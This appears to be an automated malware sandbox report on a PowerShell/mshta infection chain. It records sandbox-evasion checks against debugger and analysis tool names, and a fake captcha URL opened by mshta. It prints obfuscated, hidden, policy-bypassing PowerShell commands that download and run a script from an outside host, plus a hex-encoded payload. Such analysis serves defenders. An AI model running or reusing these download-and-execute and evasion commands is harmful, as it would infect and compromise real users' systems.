Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IEX-QZZD%B(_DYT~PDTXBK3F.JQ86R1ZW(PE5IEJN@OUOSH1@NC/A-;GAXYC/M75H"SV)VUU91}C#2H\KQ;J4LFM0WRYK:GO\/L*{IX37351521863506478298354615FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -*;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME)|MEMBER|WHERE-OBJECT{$_.NAME-LIKE''*T*OM*D''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).PSOBJECT.METHODS|WHERE-OBJECT{$_.NAME-LIKE''*OM*E''}).NAME).INVOKE(''N*-O*'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI VARIABLE:CIU).VALUE|MEMBER)|WHERE-OBJECT{$_.NAME-LIKE''*NL*G''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, $XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX $OXSST) $XIIU}}}JWDQL;P
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -*;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME)|MEMBER|WHERE-OBJECT{$_.NAME-LIKE''*T*OM*D''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT|MEMBER)[6].NAME).PSOBJECT.METHODS|WHERE-OBJECT{$_.NAME-LIKE''*OM*E''}).NAME).INVOKE(''N*-O*'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI VARIABLE:CIU).VALUE|MEMBER)|WHERE-OBJECT{$_.NAME-LIKE''*NL*G''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, $XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX $OXSST) $XIIU}}}JWDQL;8
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Source: powershell.exe, 00000004.00000002.1811581786.000001E5D980C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2192Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1019Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5326Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4179Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6387Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3386Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7740Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -11068046444225724s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000004.00000002.1866121722.000001E5F23A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000004.00000002.1860583581.000001E5F1D3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW .N
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893916483.000001F01B51C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1874624534.000001F01B51C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1885827801.000001F01B51C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2901407465.000002627585F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2900434942.000002627042B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1858155498.000001E5F1A11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1866121722.000001E5F23A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-90VO
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_@>q
Source: powershell.exe, 00000006.00000002.2214673362.0000000006CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3DJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function frszn($zlkrb){return -split ($zlkrb -replace '..', '0x$& ')};$vuqbu = frszn('c3a33c52a21c41b9f45dd91b9a3bf30cf2ec6edd823c9cece83ad45776a5b6cca18208e15a52df5b7f83353d6e23bd618f30020318aa0658a8b9202e85f786765caab181b34d40f3e1afbb439a24557ca57621a37bd3fd396effd4a447891c80c3a87a883d5313addb72306d4184811757153e08edd2ef4becf037797b4b79f777c6223cc775bc4b03cc115c23ad1596e113a7f8e74eb4eec5e6d17a73f590bca9be30fe8de26e4f3f386bc2b0df4c8b789f385d01cc9deefe7ffe963cad5b715105e46717c1f8ca599aac7c726247b67b2ef008d6815624c48d8921d6c026c2d761b3c73420e46d41eb38b2be6dc3a6e728398be20df964e092c95fff64376795c2eb65f33ec3620d837926668055a522e8a88ac3164b0ffa0fe44948e6327c8e69269e914364f60006f48eb7a2f9830777b3c6bc5165322ac78640320b0b34d2aa9c9ef97d71caf1be1edd212144c4e5eda5048bffd67a1dae7b36d7277064edf983455e52e8a0a77bcef0fa38ab0c8d4ea1fca20a03b622cfd25f156452a918d62ccd80d0060df532d92d537f9e1ecc41864005c3c9e067c14930765854957efb5e71dda020e9c8287b2f961f0bdc387138260abc45fb51ea8ae2b650d5b9c6e9c5687580b83cc67faabc67d590702c85406ab842938c6700bdee21992168619bea16916fb865dc5f6df6d9f4f1b2cca2d2bf385a560e8f04c765355464b3f06bdd88ea77e44a2d1776f2b6cd01864cfee829fb17a5e70d006d79c119dc5f57a9a25aa984aa5b1704215ffbc39398a42cb74f3594aa3d56dae65b45e14cc7b4611364ce10e2a98948a4408130f9c618d3f505b018949f27c940b9058868e152dd2a4787f24ad17bf0a1f6bf9df717f3bfd33dc5a1972c3919f13aee4cb268c7dc3f54cf3ac0ee2ba15d2c8d82c9a8c7b8b2a0fd03b7aa09ea4f38e2b6fd1c519eacedae21d18fb3b6cbb0a3cd5570de3f6c90d36eaa1e063743143eba60b985de8361c93ec0d22bcad34d88804a5c111c47c68ee0d30ac9c64f3ae88ba57295f333c3b513e91ef96441c281655217ba1de5c3fdec2419e6ddac538710d679ff0df83b2ebe940e136711ed6c3c0fbfad98c9cd7fceeb3415207acaaa8f091cdd9d584db90bd37d6e6aa2be9e6344e6c4a74a99dbc82a78e28f9aaba7bab79ef7ecd2ec5397e326870a7a51e0d74d954c0215e1baa229e0816aabbcb00a25173c21e313511b1c978fd55355adfbf4e15ebd0a9b52c25e32ea220c9d9dbacd18ee9ceec99257188138d0abbd29c4dffc9b960a9cec94df767700576a1ef94d8b5f25088c95cb11f2ac671514479e6568df04f03553a9607589926aabeedce4449e803e102f7e84665c1edbe23e8c0d5dfab8c81bc5277aaaa134c26cd84c912045fee79030eaf24569738bdc109fe8349634563c2f5ee96e70c6932af1ab2c27f468aa44a2b4e2abebb52f245ab3e0b51a5d301366672fe9f491d4f1038b32f46286f25d8d40248a896053e14be3da4565ab47483a26ab50d34af15bfc76980b08272d58f9cab8f88e13142e13805c1eca94d3c7934eab6a74c1baa74cd734574037b043e95c8086cfe97d42c4b9a7f1c21bc9fe6ffec1daf361c9a765c5c0a9e41d0d9fde014881d03d024f34a7eb